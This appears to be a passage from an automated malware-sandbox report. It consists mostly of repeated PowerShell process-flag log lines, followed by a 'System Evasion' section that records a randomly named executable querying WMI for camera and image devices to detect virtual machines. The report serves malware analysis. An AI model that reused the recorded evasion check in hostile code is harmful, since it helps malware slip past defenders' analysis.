                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
